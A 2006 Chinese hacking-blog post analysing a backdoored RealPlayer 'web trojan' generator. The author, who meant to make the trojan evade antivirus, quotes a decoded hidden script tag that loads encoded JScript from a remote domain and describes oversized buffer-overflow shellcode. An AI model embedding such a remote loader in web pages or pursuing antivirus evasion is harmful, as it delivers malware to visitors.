在水一方

<<  再谈FSG脱壳 | 首 页 | Seh异常原理和利用  >>

• 关于Realplayer牛X版网页木马生成器

  2006年05月28日

  Tag：垃圾，还有后门

  版权声明：转载时请以超链接形式标明文章原始出处和作者信息及本声明
  http://milw0rm.blogbus.com/logs/2561308.html
  
  

  今天下载了个Realplayer牛X版网页木马生成器,打算做免杀的.

  然后,发现index.htm的源代码很奇怪,好象是加密了,最下方调用了ENCODE过的JS文件.

  http://www.wocao.net/js/wocao.ocx这个就是改了扩展名的JS文件,一样可以用.

  然后我就下载了wocao.ocx文件,解了密,还是看不懂是什么意思.

  过了一会,发现http://www.wocao.net/js/wocao.ocx这个地址打不开了。很奇怪.

  并且http://www.wocao.net/js/这个目录也不存在,而且需要密码.

  我判断,一定是www.wocao.net这个域名更新了指向的IP.指到一个普通的虚拟主机服务器上了.

  当我把INDEX.HTM解密后,发现最下方有这么一段代码:

  <script src=\"http://www.wocao.net/js/wocao2.ocx\" language=\"JScript.Encode\"></script>

  大家注意,这里的地址http://www.wocao.net/js/wocao2.ocx和http://www.wocao.net/js/wocao.ocx这个地址很像,但不一样的。很明显,为了迷惑大家!!!~

  我正准备看http://www.wocao.net/js/wocao2.ocx的内容时,才发现,www.wocao.net已经把域名指向给换了。.

  日 !!

  那个wocao2.ocx代码里一定加载了木马!!!!

  还有,music.smi文件的SHELLCODE也有问题。本来是256个字节长度就可以触发缓冲区溢出漏洞的，结果他却把SHELLCODE弄得好大,有1.3几KB!!!!

  知道这意味着什么么?很有可能在SHELLCODE里加了另一段后门代码!!

  另外,根据作者BLOG上的留言评论来看,这个网马是加了后门的。口碑不好,请大家不要使用!!!

  网页木马本身的逻辑也有问题。

  当我把index.htm解密后,发现,INDEX.HTM根本就没调用到MUSIC.HTM文件,可生成器却说要调用,日!!!骗局!!!

  不知道他搞什么名堂...

  总之,一句话,这款网页木马就是垃圾,有不止一个后门!!!!

  
  

  随机文章：

  难得糊涂 2009年11月04日

  Seh异常原理和利用 2006年06月07日

  再谈FSG脱壳 2006年05月21日

  bin2txt 1.0 2006年05月20日

  Log Cleaner V0.1 By noname 2006年05月20日

  
  收藏到：Del.icio.us

  
  
  
  
  
  引用地址：

  黑暗之子 发表于21:12:32 | 编辑 | 继续话题 | 转发 | 分享　0